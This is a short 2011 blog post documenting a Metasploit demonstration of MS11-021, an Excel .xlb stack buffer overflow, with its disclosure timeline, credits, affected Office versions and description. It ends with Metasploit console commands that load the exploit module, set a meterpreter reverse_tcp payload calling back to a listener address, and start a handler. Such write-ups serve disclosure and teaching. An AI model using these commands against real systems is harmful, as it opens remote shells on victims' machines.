Monday, November 7, 2011

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway

Vulnerability reported to vendor by ZDI the 2010-10-18

Coordinated release of the vulnerability the 2011-04-12

Metasploit PoC provided the 2011-11-05


PoC provided by :


Aniway

abysssec

sinn3r

juan vazquez


Reference(s) :


CVE-2011-0105

MS11-021

ZDI-11-121


Affected version(s) :


Microsoft Office XP Service Pack 3

Microsoft Office 2003 Service Pack 3

Microsoft Office 2007 Service Pack 2

Microsoft Office 2010 (32 and 64 bits edition)

Microsoft Office 2004 for Mac

Microsoft Office 2008 for Mac

Microsoft Office for Mac 2011

Open XML File Format Converter for Mac

Microsoft Excel Viewer Service Pack 2

Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2


Tested on Windows XP Pro SP3 with :


Microsoft Office Excel 2007 (12.0.4518.014)


Description :


This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.


Commands :


use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo